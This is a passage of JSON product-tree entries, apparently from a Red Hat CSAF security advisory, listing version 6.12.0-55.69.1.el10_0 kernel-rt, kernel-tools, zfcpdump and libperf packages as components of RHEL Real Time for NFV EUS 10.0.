"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.s390x as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.s390x",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-55.69.1.el10_0.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64"
},
"product_reference": "libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v. 10.0)",
"product_id": "NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"relates_to_product_reference": "NFV-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
